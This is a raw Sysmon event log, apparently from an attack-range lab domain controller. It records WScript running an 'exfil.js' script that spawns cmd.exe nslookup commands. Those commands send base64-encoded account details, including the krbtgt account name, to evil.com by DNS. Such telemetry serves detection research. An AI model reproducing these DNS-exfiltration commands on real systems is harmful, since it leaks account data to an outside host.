14:16:34.521{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201307Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.521{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201306Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.521{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201305Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.521{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201304Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.521{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C2-629A-CD40-000000005F02}1788C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201303Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.521{2E1864BB-17C2-629A-CB40-000000005F02}5127432C:\Windows\system32\cmd.exe{2E1864BB-17C2-629A-CD40-000000005F02}1788C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000201302Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.521{2E1864BB-17C2-629A-CD40-000000005F02}1788C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXGtyYnRndA== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C2-629A-CB40-000000005F02}512C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXGtyYnRndA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlyrohw.tmp 2>&1 10341000x8000000000000000201301Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.483{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17C2-629A-CC40-000000005F02}7208C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201300Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.483{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C2-629A-CC40-000000005F02}7208C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201299Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.468{2E1864BB-17C2-629A-CC40-000000005F02}72085108C:\Windows\system32\conhost.exe{2E1864BB-17C2-629A-CB40-000000005F02}512C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201298Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.468{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C2-629A-CC40-000000005F02}7208C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201297Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.452{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201296Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.452{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201295Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.452{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201294Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.452{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201293Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.452{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C2-629A-CB40-000000005F02}512C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201292Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.452{2E1864BB-17A1-629A-783D-000000005F02}55526580C:\Windows\System32\WScript.exe{2E1864BB-17C2-629A-CB40-000000005F02}512C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000201291Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.458{2E1864BB-17C2-629A-CB40-000000005F02}512C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXGtyYnRndA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlyrohw.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000201290Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.452{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlvmz.tmpMD5=24F4EB82345A0DA00DE01E116A71736E,SHA256=1239B48CF33DE00FBE8DCE68AC67A1D60A6D2C2E699D9B3665FAD4716A3235AA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000201289Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.396{2E1864BB-17C2-629A-C940-000000005F02}42326248C:\Windows\system32\conhost.exe{2E1864BB-17C2-629A-CA40-000000005F02}5992C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201288Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.396{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201287Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.396{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201286Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.396{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201285Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.396{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201284Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.396{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C2-629A-CA40-000000005F02}5992C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201283Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.396{2E1864BB-17C2-629A-C840-000000005F02}77805556C:\Windows\system32\cmd.exe{2E1864BB-17C2-629A-CA40-000000005F02}5992C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000201282Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.397{2E1864BB-17C2-629A-CA40-000000005F02}5992C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C2-629A-C840-000000005F02}7780C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvmz.tmp 2>&1 10341000x8000000000000000201281Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.366{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17C2-629A-C940-000000005F02}4232C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201280Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.366{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C2-629A-C940-000000005F02}4232C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201279Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.352{2E1864BB-17C2-629A-C940-000000005F02}42326248C:\Windows\system32\conhost.exe{2E1864BB-17C2-629A-C840-000000005F02}7780C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201278Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.335{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C2-629A-C940-000000005F02}4232C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201277Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.335{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C2-629A-C840-000000005F02}7780C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201276Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 